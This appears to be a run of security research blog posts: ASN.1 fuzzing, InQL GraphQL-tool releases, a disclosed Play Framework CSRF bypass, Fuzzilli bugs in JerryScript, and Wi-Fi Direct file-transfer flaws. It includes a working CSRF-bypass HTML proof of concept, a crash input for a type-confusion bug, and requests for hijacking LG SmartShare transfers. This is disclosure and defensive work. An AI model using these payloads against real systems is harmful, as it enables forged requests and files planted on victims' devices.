At this first sight, ASN.1 might even seem quite simple and intuitive. But don’t be fooled! ASN.1 contains a lot of vestigial and complex features. For a start, it has ~13 string types. Constraints can be placed on fields, for instance, integers and the string sizes can be restricted to an acceptable range.

The real complexity beasts however are information objects, parametrization and tabular constraints. Information objects allows the definition of templates for data types and a grammar to declare instances of that template (oh yeah…defining a grammar within a grammar!).

This is how a template for different message types could be defined:

-- Definition of the MESSAGE-CLASS information object class
MESSAGE-CLASS ::= CLASS {
    messageTypeId INTEGER UNIQUE
    &payload      [1] OPTIONAL,
    ...
}
WITH SYNTAX {
    MESSAGE-TYPE-ID  &messageTypeId
    [PAYLOAD    &payload]
}

-- Definition of some message types
TextMessageKinds MESSAGE-CLASS ::= {
    -- Text message
    {MESSAGE-TYPE-ID 0, PAYLOAD UTF8String}
    -- Read ACK (no payload)
  | {MESSAGE-TYPE-ID 1, PAYLOAD Sequence { ToMessageId INTEGER } }
}

MediaMessageKinds MESSAGE-CLASS ::= {
    -- JPEG
    {MESSAGE-TYPE-ID 2, PAYLOAD OctetString}
}

Parametrization allows the introduction of parameters in the specification of a type:

Message {MESSAGE-CLASS : MessageClass} ::= SEQUENCE {
    messageId     INTEGER,
    senderId      INTEGER,
    recipientId   INTEGER,
    sendTime      GeneralizedTime,
    messageTypeId MESSAGE-CLASS.&messageTypeId ({MessageClass}),
    payload       MESSAGE-CLASS.&payload ({MessageClass} {@messageTypeId})
}

While a complete overview of the format is not within the scope of this post, a very good entry-level, but quite comprehensive, resource I found is this ASN1 Survival guide. The nitty-gritty details can be found in the ITU standards X.680 to X.683.

Powerful as it may be, ASN.1 suffers from a large practical problem - it lacks a wide choice of compilers (parser generators), especially non-commercial ones. Most of them do not implement advanced features like information objects. This means that more often than not, data structures defined using ASN.1 are serialized and unserialized by handcrafted code instead of an autogenerated parser. This is also true for many libraries handling TLS certificates.

DER

DER (Distinguished Encoding Rules) is an encoding used to translate an ASN.1 object into bytes. It is a simple Tag-Length-Value format: each element is encoded by appending its type (tag), the length of the payload, and the payload itself. Its rules ensure there is only one valid representation for any given object, a useful property when dealing with digital certificates that must be signed and checked for anomalies.

The details of how DER works are not relevant to this post. A good place to start is here.

RFC 5280 and X.509

The format of the digital certificates used in TLS is defined in some RFCs, most importantly RFC 5280 (and then in RFC 5912, updated for ASN.1 2002). The specification is based on the ITU X.509 standard.

This is what the outermost layer of a TLS certificate contains:

Certificate  ::=  SEQUENCE  {
    tbsCertificate       TBSCertificate,
    signatureAlgorithm   AlgorithmIdentifier,
    signature            BIT STRING  
}

TBSCertificate  ::=  SEQUENCE  {
    version         [0]  Version DEFAULT v1,
    serialNumber         CertificateSerialNumber,
    signature            AlgorithmIdentifier,
    issuer               Name,
    validity             Validity,
    subject              Name,
    subjectPublicKeyInfo SubjectPublicKeyInfo,
    issuerUniqueID  [1]  IMPLICIT UniqueIdentifier OPTIONAL,
                         -- If present, version MUST be v2 or v3
    subjectUniqueID [2]  IMPLICIT UniqueIdentifier OPTIONAL,
                         -- If present, version MUST be v2 or v3
    extensions      [3]  Extensions OPTIONAL
                         -- If present, version MUST be v3 --
}

You may recognize some of these fields from inspecting a certificate using a browser integrated viewer.

Doyensec X509 certificate

Finding out what exactly should go inside a TLS certificate and how it should be interpreted was not an easy task - specifications were scattered inside a lot of RFCs and other standards, sometimes with partial or even conflicting information. Some documents from the recent past offer a good insight into the number of contradictory interpretations. Nowadays there seems to be more convergence, and a good place to start when looking for how a TLS certificate should be handled is the RFCs together with a couple of widely used TLS libraries.

Fuzzing TLS starting from ASN.1

Previous work

All the high profile TLS libraries include some fuzzing harnesses directly in their source tree and most are even continuously fuzzed (like LibreSSL which is now included in oss-fuzz thanks to my colleague Andrea). Most libraries use tried-and-tested fuzzers like AFL or libFuzzer, which are not encoding or syntax aware. This very likely means that many cycles are wasted generating and testing inputs which are rejected early by the parsers.

X.509 parsers have been fuzzed using many approaches. Frankencert, for instance, generates certificates by combining parts from existing ones, while CertificateFuzzer uses a hand-coded grammar. Some fuzzing efforts are more targeted towards discovering memory-corruption types of bugs, while others are more geared towards discovering logic bugs, often comparing the behavior of multiple parsers side by side to detect inconsistencies.

ASN1Fuzz

I wanted a tool capable of generating valid inputs from an ASN.1 grammar, so that I can slightly break them and hopefully find some vulnerabilities. I couldn’t find any tool accepting ASN.1 grammars, so I decided to build one myself.

After a lot of experimentation and three full rewrites, I have a pipeline that generates valid X509 certificates which looks like this

     +-------+
     | ASN.1 |
     +---+---+
         |
      pycrate
         |
 +-------v--------+        +--------------+
 | Python classes |        |  User Hooks  |
 +-------+--------+        +-------+------+
         |                         |
         +-----------+-------------+
                     |
                 Generator
                     |
                     |
                 +---v---+
                 |       |
                 |  AST  |
                 |       |
                 +---+---+
                     |
                  Encoder
                     |
               +-----v------+
               |            |
               |   Output   |
               |            |
               +------------+

First, I compile the ASN.1 grammar using pycrate, one of the few FOSS compilers that support most of the advanced features of ASN.1.

The output of the compiler is fed into the Generator. With a lot of introspection inside the pycrate classes, this component generates random ASTs conforming to the input grammar. The ASTs can be fed to an encoder (e.g. DER) to create a binary output suitable for being tested with the target application.

Certificates produced like this would not be valid, because many constraints are not encoded in the syntax. Moreover, I wanted to give the user total freedom to manipulate the generator behavior. To solve this problem I developed a handy hooking system which allows overrides at any point in the generator:

from pycrate_asn1dir.X509_2016 import AuthenticationFramework
from generator import Generator

spec = AuthenticationFramework.Certificate
cert_generator = Generator(spec)

@cert_generator.value_hook("Certificate/toBeSigned/validity/notBefore/.*")
def generate_notBefore(generator: Generator, node):
    now = int(time.time())
    start = now - 10 * 365 * 24 * 60 * 60  # 10 years ago
    return random.randint(start, now)

@cert_generator.node_hook("Certificate/toBeSigned/extensions/_item_[^/]*/" \
                          "extnValue/ExtnType/_cont_ExtnType/keyIdentifier")
def force_akid_generation(generator: Generator, node):
    # keyIdentifier should be present unless the certificate is self-signed
    return generator.generate_node(node, ignore_hooks=True)

@cert_generator.value_hook("Certificate/signature")
def generate_signature(generator: Generator, node):
    # (... compute signature ...)
    return (sig, siglen)

The AST generated by this pipeline can be already used for differential testing. For instance, if a library accepts the certificate while others don’t, there may be a problem that requires manual investigation.

In addition, the ASTs can be mutated using a custom mutator for AFL++ which performs random operations on the tree.

ASN1Fuzz is currently research-quality code, but I do aim at open sourcing it at some point in the future. Since the generation starts from ASN.1 grammars, the tool is not limited to generating TLS certificates, and it could be leveraged in fuzzing a plethora of other protocols.

Stay tuned for the next blog post where I will present the results from this research!

InQL Scanner v2 is out!

10 June 2020 at 22:00

InQL dyno-mites release

After the public launch of InQL we received an overwhelming response from the community. We’re excited to announce a new major release available on Github. In this version (codenamed dyno-mites), we have introduced a few cool features and a new logo!

InQL Logo

Jython Standalone GUI

As you might know, InQL can be used as a stand-alone tool, or as a Burp Suite extension (available for both Professional and Community editions). Using GraphQL built-in introspection query, the tool collects queries, mutations, subscriptions, fields, arguments, etc to automatically generate query templates that can be used for QA / security testing.

In this release, we introduced the ability to have a Jython standalone GUI similar to the Burp’s one:

$ brew install jython
$ jython -m pip install inql
$ jython -m inql

Advanced Query Editor

Many users have asked for syntax highlighting and code completion. Et Voila!

InQL GraphiQL

InQL v2 includes an embedded GraphiQL server. This server works as a proxy and handles all the requests, enhancing them with authorization headers. GraphiQL server improves the overall InQL experience by providing an advanced query editor with autocompletion and other useful features. We also introduced stubbing of introspection queries when introspection is not available.

We imagine people working between GraphiQL, InQL and other Burp Suite tools hence we included a custom “Send to GraphiQL” / “Send To Repeater” flow to be able to move queries back and forth between the tools.

InQL v2 Flow

Tabbed Editor with Multi-Query and Variables support

But that’s not all. On the Burp Suite extension side, InQL is now handling batched-queries and searching inside queries.

InQL v2 Editor

This was possible through re-engineering the editor in use (e.g. the default Burp text editor) and including a new tabbed interface able to sync between multiple representation of these queries.

BApp Store

Finally, InQL is now available on the Burp Suite’s BApp store so that you can easily install the extension from within Burp’s extension tab.

Stay tuned!

In just three months, InQL has become the go-to utility for GraphQL security testing. We received a lot of positive feedback and decided to double down on the development. We will keep improving the tool based on users’ feedback and the experience we gain through our GraphQL security testing services.

This project was crafted with love in the Doyensec Research Island.

CSRF Protection Bypass in Play Framework

19 August 2020 at 22:00

This blog post illustrates a vulnerability affecting the Play framework that we discovered during a client engagement. This issue allows a complete Cross-Site Request Forgery (CSRF) protection bypass under specific configurations.

By their own words, the Play Framework is a high velocity web framework for java and scala. It is built on Akka which is a toolkit for building highly concurrent, distributed, and resilient message-driven applications for Java and Scala.

Play is a widely used framework and is deployed on web platforms for both large and small organizations, such as Verizon, Walmart, The Guardian, LinkedIn, Samsung and many others.

Old school anti-CSRF mechanism

In older versions of the framework, CSRF protection were provided by an insecure baseline mechanism - even when CSRF tokens were not present in the HTTP requests.

This mechanism was based on the basic differences between Simple Requests and Preflighted Requests. Let’s explore the details of that.

A Simple Request has a strict ruleset. Whenever these rules are followed, the user agent (e.g. a browser) won’t issue an OPTIONS request even if this is through XMLHttpRequest. All rules and details can be seen in this Mozilla’s Developer Page, although we are primarily interested in the Content-Type ruleset.

The Content-Type header for simple requests can contain one of three values:

  • application/x-www-form-urlencoded
  • multipart/form-data
  • text/plain

If you specify a different Content-Type, such as application/json, then the browser will send a OPTIONS request to verify that the web server allows such a request.

Now that we understand the differences between preflighted and simple requests, we can continue onwards to understand how Play used to protect against CSRF attacks.

In older versions of the framework (until version 2.5, included), a black-list approach on receiving Content-Type headers was used as a CSRF prevention mechanism.

In the 2.8.x migration guide, we can see how users could restore Play’s old default behavior if required by legacy systems or other dependencies:

application.conf

play.filters.csrf {
  header {
    bypassHeaders {
      X-Requested-With = "*"
      Csrf-Token = "nocheck"
    }
    protectHeaders = null
  }
  bypassCorsTrustedOrigins = false
  method {
    whiteList = []
    blackList = ["POST"]
  }
  contentType.blackList = ["application/x-www-form-urlencoded", "multipart/form-data", "text/plain"]
}

In the snippet above we can see the core of the old protection. The contentType.blackList setting contains three values, which are identical to the content type of “simple requests”. This has been considered as a valid (although not ideal) protection since the following scenarios are prevented:

  • attacker.com embeds a <form> element which posts to victim.com
    • Form allows form-urlencoded, multipart or plain, which are all blocked by the mechanism
  • attacker.com uses XHR to POST to victim.com with application/json
    • Since application/json is not a “simple request”, an OPTIONS will be sent and (assuming a proper configuration) CORS will block the request
  • victim.com uses XHR to POST to victim.com with application/json
    • This works as it should, since the request is not cross-site but within the same domain

Hence, you now have CSRF protection. Or do you?

Looking for a bypass

Armed with this knowledge, the first thing that comes to mind is that we need to make the browser issue a request that does not trigger a preflight and that does not match any values in the contentType.blackList setting.

The first thing we did was map out requests that we could modify without sending an OPTIONS preflight. This came down to a single request: Content-Type: multipart/form-data

This appeared immediately interesting thanks to the boundary value: Content-Type: multipart/form-data; boundary=something

The description can be found here:

For multipart entities the boundary directive is required, which consists of 1 to 70 characters from a set of characters known to be very robust through email gateways, and not ending with white space. It is used to encapsulate the boundaries of the multiple parts of the message. Often, the header boundary is prepended with two dashes and the final boundary has two dashes appended at the end.

So, we have a field that can actually be modified with plenty of different characters and it is all attacker-controlled.

Now we need to dig deep into the parsing of these headers. In order to do that, we need to take a look at Akka HTTP which is what the Play framework is based on.

Looking at HttpHeaderParser.scala, we can see that these headers are always parsed:

private val alwaysParsedHeaders = Set[String](
    "connection",
    "content-encoding",
    "content-length",
    "content-type",
    "expect",
    "host",
    "sec-websocket-key",
    "sec-websocket-protocol",
    "sec-websocket-version",
    "transfer-encoding",
    "upgrade"
)

And the parsing rules can be seen in HeaderParser.scala which follows RFC 7230 Hypertext Transfer Protocol (HTTP/1.1): Message Syntax and Routing, June 2014.

def `header-field-value`: Rule1[String] = rule {
FWS ~ clearSB() ~ `field-value` ~ FWS ~ EOI ~ push(sb.toString)
}
def `field-value` = {
var fwsStart = cursor rule {
zeroOrMore(`field-value-chunk`).separatedBy { // zeroOrMore because we need to also accept empty values
run { fwsStart = cursor } ~ FWS ~ &(`field-value-char`) ~ run { if (cursor > fwsStart) sb.append(' ') }
} }
}
def `field-value-chunk` = rule { oneOrMore(`field-value-char` ~ appendSB()) } def `field-value-char` = rule { VCHAR | `obs-text` }
def FWS = rule { zeroOrMore(WSP) ~ zeroOrMore(`obs-fold`) } def `obs-fold` = rule { CRLF ~ oneOrMore(WSP) }

If these parsing rules are not obeyed, the value will be set to None. Perfect! That is exactly what we need for bypassing the CSRF protection - a “simple request” that will then be set to None thus bypassing the blacklist.

How do we actually forge a request that is allowed by the browser, but it is considered invalid by the Akka HTTP parsing code?

We decided to let fuzzing answer that, and quickly discovered that the following transformation worked: Content-Type: multipart/form-data; boundary=—some;randomboundaryvalue

An extra semicolon inside the boundary value would do the trick and mark the request as illegal:

POST /count HTTP/1.1
Host: play.local:9000
...
Content-Type: multipart/form-data;boundary=------;---------------------139501139415121
Content-Length: 0

Response

Response:
HTTP/1.1 200 OK
...
Content-Type: text/plain; charset=UTF-8 Content-Length: 1
5

This is also confirmed by looking at the logs of the server in development mode:

a.a.ActorSystemImpl - Illegal header: Illegal 'content-type' header: Invalid input 'EOI', exptected tchar, OWS or ws (line 1, column 74): multipart/form-data;boundary=------;---------------------139501139415121

And by instrumenting the Play framework code to print the value of the Content-Type:

Content-Type: None

Finally, we built the following proof-of-concept and notified our client (along with the Play framework maintainers):

<html>
    <body>
        <h1>Play Framework CSRF bypass</h1>
        <button type="button" onclick="poc()">PWN</button> <p id="demo"></p>
        <script>
        function poc() {
            var xhttp = new XMLHttpRequest(); xhttp.onreadystatechange = function() {
                if (this.readyState == 4 && this.status == 200) {
                    document.getElementById("demo").innerHTML = this.responseText; 
                } 
            };
            xhttp.open("POST", "http://play.local:9000/count", true);
            xhttp.setRequestHeader(
                "Content-type",
                "multipart/form-data; boundary=------;---------------------139501139415121"
            );
            xhttp.withCredentials = true;
            xhttp.send("");
        }
        </script>
    </body>
</html>

Credits & Disclosure

This vulnerability was discovered by Kevin Joensen and reported to the Play framework via [email protected] on April 24, 2020. This issue was fixed on Play 2.8.2 and 2.7.5. CVE-2020-12480 and all details have been published by the vendor on August 10, 2020. Thanks to James Roper of Lightbend for the assistance.

Fuzzing JavaScript Engines with Fuzzilli

8 September 2020 at 22:00

Background

As part of my research at Doyensec, I spent some time trying to understand current fuzzing techniques, which could be leveraged against the popular JavaScript engines (JSE) with a focus on V8. Note that I did not have any prior experience with fuzzing JSEs before starting this journey.

Dharma

My experimentation started with a context-free grammar (CFG) generator: Dharma. I quickly realized that the grammar rules for generating valid JavaScript code that does something interesting are too complicated. Type confusion and JIT engine bugs were my primary focus, however, most of the generated code was syntactically incorrect. Every statement was wrapped in a try/catch block to deal with the incorrect code. After a few days of fuzzing, I was only able to find out-of-memory (OOM) bugs. If you want to read more about V8 JIT and Dharma, I recommend this thoughtful research.

Dharma allows you to specify three sections for various purposes. The first one is called variable and enables you the definition of variables later used in the value section. The last one, variance is commonly used to specify the starting symbol for expanding the CFG tree.

The linkage is implemented inside the value and a nice feature of Dharma is that here you only define the assignment rules or function invocations, and the variables are automatically created when needed. However, if we assign a variable of type A to one with the different type B, we have to include all the type A rules inside the type B object.

Here is an example of such rule:

try { !TYPEDARRAY! = !ARRAYBUFFER!.slice(!ANY_FUNCTION!, !ANY_FUNCTION!) } catch (e) {};

As you can imagine, without writing an additional library, the code quickly becomes complicated and clumsy.

Fuzzing with coverage is mandatory when targeting popular software as a pure blackbox approach only scratches the attack surface. Coverage could be easily obtained when the binary is compiled with a specific Clang (compiler frontend, part of the LLVM infrastructure) flag. Part of the output could be seen in the picture below. In my case, it was only useful for the manual code review and grammar adjustment, as there was no convenient way how to implement the mutator on the JavaScript source code.

Coverage Report for V8

Fuzzilli

As an alternative approach, I started to play with Fuzzilli, which I think is incredible and still a very underrated fuzzer, implemented by Samuel Groß (aka Saelo). Fuzzilli uses an intermediate representation (IR) language called FuzzIL, which is perfectly suitable for mutating. Moreover, any program in FuzzIL could always be converted (lifted) to a valid JavaScript code.

At that time, the supported targets were V8, SpiderMonkey, and JavaScriptCore. As these engines continuously undergo widespread fuzzing, I instead decided to implement support for a different JavaScript Engine. I was also interested in the communication protocol between the fuzzer and the engine, so I considered expanding this fuzzer to be an excellent exercise.

I decided to add support for JerryScript. In the past years, numerous security issues have been discovered on this target by Fuzzinator, which uses the ANTLR v4 testcase generator Grammarinator. Those bugs were investigated and fixed, so I wanted to see if Fuzzilli could find something new.

Fuzzilli Basics

REPRL

The best available high-level documentation about Fuzzilli is Samuel’s Masters Thesis, where it was introduced, and I strongly recommend reading it as this article summarizes some of the novel ideas.

Many modern fuzzer architectures use Forkserver. The idea behind it is to run the program until the initialization is complete, but before it processes any input. Right after that, the input from the fuzzer is read and passed to a newly forked child. The overhead is low since the initialization possibly only occurs once, or when a restart is needed (e.g. in the case of continuous memory leaks).

Fuzzilli uses the REPRL approach, which saves the overhead caused by fork() and the measured execution per sample could be ~7 times faster. The JSE engine is modified to read the input from the fuzzer, and after it executes the sample, it obtains the coverage. The crucial part is to reset the state, which is normally (obviously) not done, as the engine uses the context of the already defined variables. In contrast with the Forkserver, we need a rudimentary knowledge of the engine. It is useful to know how the engine’s string representation is internally implemented to feed the input or add additional commands.

Coverage

LLVM gives a convenient way to obtain the edge coverage. Providing the -fsanitize-coverage=trace-pc-guard compiler flag to Clang, we can receive a pointer to the start and end of the regions, which are initialized by the guard number, as can be read in the llvm documentation:

extern "C" void __sanitizer_cov_trace_pc_guard_init(uint32_t *start,
                                                    uint32_t *stop) {
  static uint64_t N;  // Counter for the guards.
  if (start == stop || *start) return;  // Initialize only once.
  printf("INIT: %p %p\n", start, stop);
  for (uint32_t *x = start; x < stop; x++)
    *x = ++N;  // Guards should start from 1.
}

The guard regions are included in the JSE target. This means that the JavaScript engine must be modified to accommodate these changes. Whenever a branch is executed, the __sanitizer_cov_trace_pc_guard callback is called. Fuzzilli uses a POSIX shared memory object (shmem) to avoid the overhead when passing the data to the parent process. Shmem represents a bitmap, where the visited edge is set and, after each JavaScript input pass, the edge guards are reinitialized.

Generation

We are not going to repeat the program generation algorithms, as they are closely described in the thesis. The surprising fact is that all the programs stem from this simple JavaScript by cleverly applying multiple mutators:

Object()

Integration with JerryScript

To add a new target, several modifications for Fuzzilli should be implemented. From a high level, the REPRL pseudocode is described here.

As we already mentioned, the JavaScript engine must be modified to conform to Fuzzilli’s protocol. To keep the same code standards and logic, we recommend adding a custom command line parameter to the engine. If we decide to run the interpreter without it, it will run normally. Otherwise, it uses the hardcoded descriptor numbers to make the parent knows that the interpreter is ready to process our input.

Fuzzilli internally uses a custom command, by default called fuzzilli, which the interpreter should also implement. The first parameter represents the operator - it could be FUZZILLI_CRASH or FUZZILLI_PRINT. The former is used to check if we can intercept the segmentation faults, while the latter (optional) is used to print the output passed as an argument. By design, the fuzzer prevents execution when some checks fail, e.g., the operation FUZZILLI_CRASH is not implemented.

The code is very similar between different targets, as you can see in the patch for JerryScript that we submitted.

For a basic setup, one needs to write a short profile file stored in Sources/FuzzilliCli/Profiles/. Here we can specify additional builtins specific to the engine, arguments, or thanks to the recent contribution from WilliamParks also the ECMAScriptVersion.

Results

By integrating Fuzzilli with JerryScript, Doyensec was able to identify multiple bugs reported over the course of four weeks through GitHub. All of these issues were fixed.

All issues were also added to the Fuzzilli Bug Showcase:

Fuzzilli Showcase

Fuzzilli is by design efficient against targets with JIT compilers. It can abuse the non-linear execution flow by generating nested callbacks, Prototypes or Proxy objects, where the state of a different object could be modified. Samples produced by Fuzzilli are specifically generated to incorporate these properties, as required for the discovery of type confusion bugs.

This behavior could be easily seen in the Issue #3836. As in most cases, the proof of concept generated by Fuzzilli is very simple:

function main() {
var v3 = new Float64Array(6);
var v4 = v3.buffer;
v4.constructor = Uint8Array;
var v5 = new Float64Array(v3);
}
main();

This could be rewritten without changing the semantics to an even simpler code:

var v1 = new Float64Array(6);
v1.buffer.constructor = Uint8Array;
new Float64Array(v1);

The root cause of this issue is described in the fix.

In JavaScript when a typed array like Float64Array is created, a raw binary data buffer could be accessed via the buffer property, represented by the ArrayBuffer type. However, the type was later altered to typed array view Uint8Array. During the initialization, the engine was expecting an ArrayBuffer instead of the typed array. When calling the ecma_arraybuffer_get_buffer function, the typed array pointer was cast to ArrayBuffer. Note that this is possible since the production build’s asserts are removed. This caused the type confusion bug on line 196.

Consequently, the destination buffer dst_buf_p contained an incorrect pointer, as we can see the memory corruption from the triage via gdb:

Program received signal SIGSEGV, Segmentation fault.
ecma_typedarray_create_object_with_typedarray (typedarray_id=ECMA_FLOAT64_ARRAY, element_size_shift=<optimized out>, proto_p=<optimized out>, typedarray_p=0x5555556bd408 <jerry_global_heap+480>)
    at /home/jerryscript/jerry-core/ecma/operations/ecma-typedarray-object.c:655
655	    memcpy (dst_buf_p, src_buf_p, array_length << element_size_shift);
(gdb) x/i $rip
=> 0x55555557654e <ecma_op_create_typedarray+346>:	rep movsb %ds:(%rsi),%es:(%rdi)
(gdb) i r rdi
rdi            0x3004100020008     844704103137288

Some of the issues, including the one mentioned above, could be probably escalated from Denial of Service to Code Execution. Because of the time constraints and little added value, we have not tried to implement a working exploit.

I want to thank Saelo for including my JerryScript patch into Fuzzilli. And many thanks to Doyensec for the funded 25% research time, which made this project possible.

Additional References

InQL Scanner v3 - Just Released!

18 November 2020 at 23:00

We’re very happy to announce that a new major release of InQL is now available on our Release Page.

InQL Logo

If you’re not familiar, InQL is a security testing tool for GraphQL technology. It can be used as a stand-alone script or as a Burp Suite extension.

By combining InQL v3 features with the ability to send query templates to Burp’s Repeater, we’ve made it very easy to exploit vulnerabilities in GraphQL queries and mutations. This drastically lowers the bar for security research against GraphQL tech stacks.

Here’s a short intro for major features that have been implemented in version 3.0:

New IIR (Introspection Intermediate Representation) and Precise Query Generation

InQL now leverages an internal introspection intermediate representation (IIR) to use details obtained from type introspection and generate arbitrarily nested queries with support for any scalar types, enumerations, arrays, and objects. IIR enables seamless “Send to Repeater” functionality from the Scanner to the other tool components (Repeater and GraphQL console).

New Cycles Detector

The new IIR allows us to inspect cycles in defined Graphql schemas by simply using access to graphql introspection-enabled endpoints. In this context, a cycle is a path in the Graphql schema that uses recursive objects in a way that leads to unlimited nesting. The detection of cycles is incredibly useful and automates tedious testing procedures by employing graph solving algorithms. In some of our past client engagements, this tool was able to find millions of cycles in a matter of minutes.

New Request Timer

InQL 3.0.0 has an integrated Query Timer. This Query Timer is a reimagination of Request Timer, which can filter for query name and body. The Query Timer is enabled by default and is especially useful in conjunction with the Cycles detector. A tester can switch between graphql-editor modes (Repeater and GraphIQL) to identify DoS queries. Query Timer demonstrates the ability to attack such vulnerable graphql endpoints by counting each query’s execution time.

InQL Timer

Bugs fixes and future development

We’re really thankful to all of you for reporting issues in our previous releases. We have implemented various fixes for functional and UX bugs, including a tricky bug caused by a sudden Burp Suite change in the latest 2020.11 update.

InQL Twitter Issue

We’re excited to see the community embracing InQL as the “go-to” standard for GraphQL security testing. More features to come, so keep your requests and bug reports coming via our Github’s Issue Page. Your feedback is much appreciated!

This project was made with love in the Doyensec Research Island.

Novel Abuses On Wi-Fi Direct Mobile File Transfers

9 December 2020 at 23:00

The Wi-Fi Direct specification (a.k.a. “peer-to-peer” or “P2P” Wi-Fi) turned 10 years old this past April. This 802.11 extension has been available since Android 4.0 through a dedicated API that interfaces with a devices’ built-in hardware which directly connects to each other via Wi-Fi without an intermediate access point. Multiple mobile vendors and early adopters of this technology quickly leveraged the standard to provide their products with a fast and reliable file transfer solution.

After almost a decade, a huge majority of mobile OEMs still rely on custom locked-in implementations for file transfer, even if large cross-vendors alliances (e.g. the “Peer-to-Peer Transmission Alliance”) and big players like Google (with the recent “Nearby Share” feature) are moving to change this in the near future.

During our research, three popular P2P file transfer implementations were studied (namely Huawei Share, LG SmartShare Beam, Xiaomi Mi Share) and all of them were found to be vulnerable due to an insecure shared design. While some groundbreaking research work attacking the protocol layer has already been presented by Andrés Blanco during Black Hat EU 2018, we decided to focus on the application layer of this particular class of custom UPnP service.

This blog post will cover the following topics:


A Recurrent Design Pattern

On the majority of OEMs solutions, mobile file transfer applications will spawn two servers:

  • A File Transfer Controller or Client (FTC), that will manage the majority of the pairing and transfer control flow
  • A File Transfer Server (FTS), that will check a session’s validity and serve the intended shared file

These two services are used for device discovery, pairing and sessions, authorization requests, and file transport functions. Usually they are implemented as classes of a shared parent application which orchestrate the entire transfer. These components are responsible for:

  1. Creating the Wi-Fi Direct network
  2. Using the standard UPnP phases to announce the device, the file service description (/description.xml), and events subscription
  3. Issuing a UPnP remote procedure call to create a transfer request with another peer
  4. Upon acceptance from the recipient, uploading the target file through an HTTP POST/PUT request to a defined location

An important consideration for the following abuses is that after a P2P Wi-Fi connection is established, its network interface (p2p-wlan0-0) is available to every application running on the user’s device having android.permission.INTERNET. Because of this, local apps can interact with the FTS and FTC services spawned by the file sharing applications on the local or remote device clients, opening the door to a multitude of attacks.


LG SmartShare Beam

Smartshare is a stock LG solution to connect their phones to other devices using Wi-Fi (DLNA, Miracast) or Bluetooth (A2DP, OPP). The Beam feature is used for file transfer among LG devices.

Just like other similar applications, an FTS ( FileTransferTransmitter in com.lge.wfds.service.send.tx) and an FTC (FileTransferReceiver in com.lge.wfds.service.send.rx) are spawned and listening on ports 54003 and 55003.

As a way of example, the following HTTP requests demonstrate the FTC and the FTS in action whenever a file transfer session between two parties is requested. First, the FTS performs a CreateSendSession SOAP action:

POST /FileTransfer/control.xml HTTP/1.1
Connection: Keep-Alive
HOST: 192.168.49.1:55003
Content-Type: text/xml; charset="utf-8"
Content-Length: 1025
SOAPACTION: "urn:schemas-wifialliance-org:service:FileTransfer:1#CreateSendSession"
 
<?xml version="1.0" encoding="UTF-8"?>
<s:Envelope
    xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
    <s:Body>
        <u:CreateSendSession
            xmlns:u="urn:schemas-wifialliance-org:service:FileTransfer:1">
            <Transmitter>Doyensec LG G6 Phone</Transmitter>
            <SessionInformation>&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;&lt;MetaInfo
                xmlns=&quot;urn:wfa:filetransfer&quot;
                xmlns:xsd=&quot;http://www.w3.org/2001/XMLSchema&quot;
                xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot; xsi:schemaLocation=&quot;urn:wfa:filetransfer http://www.wi-fi.org/specifications/wifidirectservices/filetransfer.xsd&quot;&gt;&lt;Note&gt;1 and 4292012bytes File Transfer&lt;/Note&gt;&lt;Size&gt;4292012&lt;/Size&gt;&lt;NoofItems&gt;1&lt;/NoofItems&gt;&lt;Item&gt;&lt;Name&gt;CuteCat.jpg&lt;/Name&gt;&lt;Size&gt;4292012&lt;/Size&gt;&lt;Type&gt;image/jpeg&lt;/Type&gt;&lt;/Item&gt;&lt;/MetaInfo&gt;
            </SessionInformation>
        </u:CreateSendSession>
    </s:Body>
</s:Envelope>

The SessionInformation node embeds an entity-escaped standard Wi-Fi Alliance schema, urn:wfa:filetransfer, transmitting a CuteCat.jpg picture. The file name (MetaInfo/Item/Name) is displayed in the file transfer prompt to show to the final recipient the name of the transmitted file. By design, after the recipient’s confirmation, a CreateSendSessionResponse SOAP response will be returned:

HTTP/1.1 200 OK
Date: Sun, 01 Jun 2020 12:00:00 GMT
Connection: Keep-Alive
Content-Type: text/xml; charset="utf-8"
Content-Length: 404
EXT: 
SERVER: UPnPServer/1.0 UPnP/1.0 Mobile/1.0
 
<?xml version="1.0" encoding="UTF-8"?>
<s:Envelope
    xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
    <s:Body>
        <u:CreateSendSessionResponse
            xmlns:u="urn:schemas-wifialliance-org:service:FileTransfer:1">
            <SendSessionID>33</SendSessionID>
            <TransportInfo>tcp:55432</TransportInfo>
        </u:CreateSendSessionResponse>
    </s:Body>
</s:Envelope>

This will contain the TransportInfo destination port that will be used for the final transfer:

PUT /CuteCat.jpeg HTTP/1.1
User-Agent: LGMobile
Host: 192.168.49.1:55432
Content-Length: 4292012
Connection: Keep-Alive
Content-Type: image/jpeg

.... .Exif..MM ...<redacted>

What could go wrong?

Unfortunately this design suffers many issues, such as:

  • A valid session ID isn’t required to finalize the transfer
    Once a CreateSendSessionResponse is issued, no authentication is required to push a file to the opened RX port. Since the DEFAULT_HTTPSERVER_PORT for the receiver is hardcoded to be 55432, any application running on the sender’s or recipient’s device can hijack the transfer and push an arbitrary file to the victim’s storage, just by issuing a valid PUT request. On top of that, the current Session IDs are easily guessable, since they are randomly chosen from a small pool (WfdsUtil.randInt(1, 100));
  • File names and type can be arbitrarily changed by the sender
    Since the transferred file name is never checked to reflect the one initially prompted to the user, it is possible for an attacker to specify a different file name or type from the one initially shown just by changing the PUT request path to an arbitrary value.
  • It is possible to send multiple files at once without user confirmation
    Once the RX port (DEFAULT_HTTPSERVER_PORT) is opened, it is possible for an attacker to send multiple files in a single transaction, without prompting any notification to the recipient.

Because of the above design issues, any malicious third-party application installed on one of the peers’ devices may influence or take over any communication initiated by the legit LG SmartShare applications, potentially hijacking legit file transfers. A wormable malicious application could abuse this insecure design to flood the local or remote victim waiting for a file transfer, effectively propagating its malicious APK without user interaction required. An attacker could also abuse this design to implant arbitrary files or evidence on a victim’s device.


Huawei Share

Huawei Share is another file sharing solution included in Huawei’s EMUI operating system, supporting both Huawei terminals and those of its second brand, Honor.

In Huawei Share, an FTS (FTSService in com.huawei.android.wfdft.fts) and an FTC (FTCService in com.huawei.android.wfdft.ftc) are spawned and listening on ports 8058 and 33003. On a high level, the Share protocol resembles the LG SmartShare Beam mechanism, but without the same design flaws.

